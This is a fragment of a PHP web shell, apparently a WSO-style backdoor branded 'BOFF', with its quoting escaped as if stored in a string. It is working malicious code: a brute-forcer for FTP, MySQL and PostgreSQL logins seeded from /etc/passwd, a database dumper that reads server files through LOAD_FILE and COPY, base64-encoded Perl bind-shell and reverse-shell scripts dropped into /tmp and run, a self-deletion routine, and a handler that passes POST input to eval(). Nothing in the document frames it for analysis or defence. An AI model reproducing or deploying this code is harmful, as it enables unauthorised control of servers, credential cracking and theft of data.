\'; BOFFFooter(); } function actionLogout() { session_destroy(); die(\'bye!\'); } function actionSelfRemove() { if($_POST[\'p1\'] == \'yes\') if(@unlink(preg_replace(\'!\(\d+\)\s.*!\', \'\', __FILE__))) die(\'Shell has been removed\'); else echo \'unlink error!\'; if($_POST[\'p1\'] != \'yes\') BOFFHeader(); echo \'

Suicide

Really want to remove the shell?
Yes
\'; BOFFFooter(); } function actionBruteforce() { BOFFHeader(); if( isset($_POST[\'proto\']) ) { echo \'

Results

Type: \'.htmlspecialchars($_POST[\'proto\']).\' Server: \'.htmlspecialchars($_POST[\'server\']).\'
\'; if( $_POST[\'proto\'] == \'ftp\' ) { function bruteForce($ip,$port,$login,$pass) { $fp = @ftp_connect($ip, $port?$port:21); if(!$fp) return false; $res = @ftp_login($fp, $login, $pass); @ftp_close($fp); return $res; } } elseif( $_POST[\'proto\'] == \'mysql\' ) { function bruteForce($ip,$port,$login,$pass) { $res = @mysql_connect($ip.\':\'.$port?$port:3306, $login, $pass); @mysql_close($res); return $res; } } elseif( $_POST[\'proto\'] == \'pgsql\' ) { function bruteForce($ip,$port,$login,$pass) { $str = "host=\'".$ip."\' port=\'".$port."\' user=\'".$login."\' password=\'".$pass."\' dbname=postgres"; $res = @pg_connect($str); @pg_close($res); return $res; } } $success = 0; $attempts = 0; $server = explode(":", $_POST[\'server\']); if($_POST[\'type\'] == 1) { $temp = @file(\'/etc/passwd\'); if( is_array($temp) ) foreach($temp as $line) { $line = explode(":", $line); ++$attempts; if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) { $success++; echo \'\'.htmlspecialchars($line[0]).\':\'.htmlspecialchars($line[0]).\'
\'; } if(@$_POST[\'reverse\']) { $tmp = ""; for($i=strlen($line[0])-1; $i>=0; --$i) $tmp .= $line[0][$i]; ++$attempts; if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) { $success++; echo \'\'.htmlspecialchars($line[0]).\':\'.htmlspecialchars($tmp); } } } } elseif($_POST[\'type\'] == 2) { $temp = @file($_POST[\'dict\']); if( is_array($temp) ) foreach($temp as $line) { $line = trim($line); ++$attempts; if( bruteForce($server[0],@$server[1], $_POST[\'login\'], $line) ) { $success++; echo \'\'.htmlspecialchars($_POST[\'login\']).\':\'.htmlspecialchars($line).\'
\'; } } } echo "Attempts: $attempts Success: $success

"; } echo \'

FTP bruteforce

\' .\'\' .\'\' .\'\' .\'\' .\'\' .\'\' .\'
Type
\' .\'\' .\'\' .\'\' .\'Server:port
Brute type
\' .\'\' .\'\' .\'
Login
Dictionary
\' .\'
\'; echo \'

\'; BOFFFooter(); } function actionSql() { class DbClass { var $type; var $link; var $res; function DbClass($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname){ switch($this->type) { case \'mysql\': if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true; break; case \'pgsql\': $host = explode(\':\', $host); if(!$host[1]) $host[1]=5432; if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true; break; } return false; } function selectdb($db) { switch($this->type) { case \'mysql\': if (@mysql_select_db($db))return true; break; } return false; } function query($str) { switch($this->type) { case \'mysql\': return $this->res = @mysql_query($str); break; case \'pgsql\': return $this->res = @pg_query($this->link,$str); break; } return false; } function fetch() { $res = func_num_args()?func_get_arg(0):$this->res; switch($this->type) { case \'mysql\': return @mysql_fetch_assoc($res); break; case \'pgsql\': return @pg_fetch_assoc($res); break; } return false; } function listDbs() { switch($this->type) { case \'mysql\': return $this->query("SHOW databases"); break; case \'pgsql\': return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!=\'t\'"); break; } return false; } function listTables() { switch($this->type) { case \'mysql\': return $this->res = $this->query(\'SHOW TABLES\'); break; case \'pgsql\': return $this->res = $this->query("select table_name from information_schema.tables where table_schema != \'information_schema\' AND table_schema != \'pg_catalog\'"); break; } return false; } function error() { switch($this->type) { case \'mysql\': return @mysql_error(); break; case \'pgsql\': return @pg_last_error(); break; } return false; } function setCharset($str) { switch($this->type) { case \'mysql\': if(function_exists(\'mysql_set_charset\')) return @mysql_set_charset($str, $this->link); else $this->query(\'SET CHARSET \'.$str); break; case \'pgsql\': return @pg_set_client_encoding($this->link, $str); break; } return false; } function loadFile($str) { switch($this->type) { case \'mysql\': return $this->fetch($this->query("SELECT LOAD_FILE(\'".addslashes($str)."\') as file")); break; case \'pgsql\': $this->query("CREATE TABLE BOFF2(file text);COPY BOFF2 FROM \'".addslashes($str)."\';select file from BOFF2;"); $r=array(); while($i=$this->fetch()) $r[] = $i[\'file\']; $this->query(\'drop table BOFF2\'); return array(\'file\'=>implode(" ",$r)); break; } return false; } function dump($table, $fp = false) { switch($this->type) { case \'mysql\': $res = $this->query(\'SHOW CREATE TABLE `\'.$table.\'`\'); $create = mysql_fetch_array($res); $sql = $create[1]."; "; if($fp) fwrite($fp, $sql); else echo($sql); $this->query(\'SELECT * FROM `\'.$table.\'`\'); $head = true; while($item = $this->fetch()) { $columns = array(); foreach($item as $k=>$v) { if($v == null) $item[$k] = "NULL"; elseif(is_numeric($v)) $item[$k] = $v; else $item[$k] = "\'".@mysql_real_escape_string($v)."\'"; $columns[] = "`".$k."`"; } if($head) { $sql = \'INSERT INTO `\'.$table.\'` (\'.implode(", ", $columns).") VALUES (".implode(", ", $item).\')\'; $head = false; } else $sql = " ,(".implode(", ", $item).\')\'; if($fp) fwrite($fp, $sql); else echo($sql); } if(!$head) if($fp) fwrite($fp, "; "); else echo("; "); break; case \'pgsql\': $this->query(\'SELECT * FROM \'.$table); while($item = $this->fetch()) { $columns = array(); foreach($item as $k=>$v) { $item[$k] = "\'".addslashes($v)."\'"; $columns[] = $k; } $sql = \'INSERT INTO \'.$table.\' (\'.implode(", ", $columns).\') VALUES (\'.implode(", ", $item).\');\'." "; if($fp) fwrite($fp, $sql); else echo($sql); } break; } return false; } }; $db = new DbClass($_POST[\'type\']); if(@$_POST[\'p2\']==\'download\') { $db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\']); $db->selectdb($_POST[\'sql_base\']); switch($_POST[\'charset\']) { case "Windows-1251": $db->setCharset(\'cp1251\'); break; case "UTF-8": $db->setCharset(\'utf8\'); break; case "KOI8-R": $db->setCharset(\'koi8r\'); break; case "KOI8-U": $db->setCharset(\'koi8u\'); break; case "cp866": $db->setCharset(\'cp866\'); break; } if(empty($_POST[\'file\'])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=dump.sql"); header("Content-Type: text/plain"); foreach($_POST[\'tbl\'] as $v) $db->dump($v); exit; } elseif($fp = @fopen($_POST[\'file\'], \'w\')) { foreach($_POST[\'tbl\'] as $v) $db->dump($v, $fp); fclose($fp); unset($_POST[\'p2\']); } else die(\'\'); } BOFFHeader(); echo "

Sql browser

TypeHostLoginPasswordDatabase
"; $tmp = ""; if(isset($_POST[\'sql_host\'])){ if($db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\'])) { switch($_POST[\'charset\']) { case "Windows-1251": $db->setCharset(\'cp1251\'); break; case "UTF-8": $db->setCharset(\'utf8\'); break; case "KOI8-R": $db->setCharset(\'koi8r\'); break; case "KOI8-U": $db->setCharset(\'koi8u\'); break; case "cp866": $db->setCharset(\'cp866\'); break; } $db->listDbs(); echo "\'; } else echo $tmp; }else echo $tmp; echo " >\' onclick=\'fs(d.sf);\'> count the number of rows
"; if(isset($db) && $db->link){ echo "
"; if(!empty($_POST[\'sql_base\'])){ $db->selectdb($_POST[\'sql_base\']); echo ""; } echo "
Tables:

"; $tbls_res = $db->listTables(); while($item = $db->fetch($tbls_res)) { list($key, $value) = each($item); if(!empty($_POST[\'sql_count\'])) $n = $db->fetch($db->query(\'SELECT COUNT(*) as n FROM \'.$value.\'\')); $value = htmlspecialchars($value); echo " ".$value."" . (empty($_POST[\'sql_count\'])?\' \':" ({$n[\'n\']})") . "
"; } echo "
File path:		"; if(@$_POST[\'p1\'] == \'select\') { $_POST[\'p1\'] = \'query\'; $_POST[\'p3\'] = $_POST[\'p3\']?$_POST[\'p3\']:1; $db->query(\'SELECT COUNT(*) as n FROM \' . $_POST[\'p2\']); $num = $db->fetch(); $pages = ceil($num[\'n\'] / 30); echo "".$_POST[\'p2\']." ({$num[\'n\']} records) Page # "; echo " of $pages"; if($_POST[\'p3\'] > 1) echo " < Prev"; if($_POST[\'p3\'] < $pages) echo " Next >"; $_POST[\'p3\']--; if($_POST[\'type\']==\'pgsql\') $_POST[\'p2\'] = \'SELECT * FROM \'.$_POST[\'p2\'].\' LIMIT 30 OFFSET \'.($_POST[\'p3\']*30); else $_POST[\'p2\'] = \'SELECT * FROM `\'.$_POST[\'p2\'].\'` LIMIT \'.($_POST[\'p3\']*30).\',30\'; echo "

"; } if((@$_POST[\'p1\'] == \'query\') && !empty($_POST[\'p2\'])) { $db->query(@$_POST[\'p2\']); if($db->res !== false) { $title = false; echo \'\'; $line = 1; while($item = $db->fetch()) { if(!$title) { echo \'\'; foreach($item as $key => $value) echo \'\'; reset($item); $title=true; echo \'\'; $line = 2; } echo \'\'; $line = $line==1?2:1; foreach($item as $key => $value) { if($value == null) echo \'\'; else echo \'\'; } echo \'\'; } echo \'
\'.$key.\'
null\'.nl2br(htmlspecialchars($value)).\'
\'; } else { echo \'
Error: \'.htmlspecialchars($db->error()).\'
\'; } } echo "

"; echo "

"; if($_POST[\'type\']==\'mysql\') { $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, \'@\', `host`) = USER() AND `File_priv` = \'y\'"); if($db->fetch()) echo "
Load file >\'>
"; } if(@$_POST[\'p1\'] == \'loadfile\') { $file = $db->loadFile($_POST[\'p2\']); echo \'
\'.htmlspecialchars($file[\'file\']).\'
\'; } } else { echo htmlspecialchars($db->error()); } echo \'
\'; BOFFFooter(); } function actionNetwork() { BOFFHeader(); $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; echo "

Network tools

Bind port to /bin/sh [perl]
Port: >\'>
Back-connect [perl]
Server: Port: >\'>

"; if(isset($_POST[\'p1\'])) { function cf($f,$t) { $w = @fopen($f,"w") or @function_exists(\'file_put_contents\'); if($w){ @fwrite($w,base64_decode($t)); @fclose($w); } } if($_POST[\'p1\'] == \'bpp\') { cf("/tmp/bp.pl",$bind_port_p); $out = BOFFEx("perl /tmp/bp.pl ".$_POST[\'p2\']." 1>/dev/null 2>&1 &"); echo "
$out
".BOFFEx("ps aux | grep bp.pl")."
"; unlink("/tmp/bp.pl"); } if($_POST[\'p1\'] == \'bcp\') { cf("/tmp/bc.pl",$back_connect_p); $out = BOFFEx("perl /tmp/bc.pl ".$_POST[\'p2\']." ".$_POST[\'p3\']." 1>/dev/null 2>&1 &"); echo "
$out
".BOFFEx("ps aux | grep bc.pl")."
"; unlink("/tmp/bc.pl"); } } echo \'
\'; BOFFFooter(); } function actionRC() { if(!@$_POST[\'p1\']) { $a = array( "uname" => php_uname(), "php_version" => phpversion(), "BOFF_version" => BOFF_VERSION, "safemode" => @ini_get(\'safe_mode\') ); echo serialize($a); } else { eval($_POST[\'p1\']); } } if( empty($_POST[\'a\']) ) if(isset($default_action) && function_exists(\'action\' . $default_action)) $_POST[\'a\'] = $default_action; else $_POST[\'a\'] = \'SecInfo\'; if( !empty($_POST[\'a\']) && function_exists(\'action\' . $_POST[\'a\']) ) call_user_func(\'action\' . $_POST[\'a\']); exit; ?> '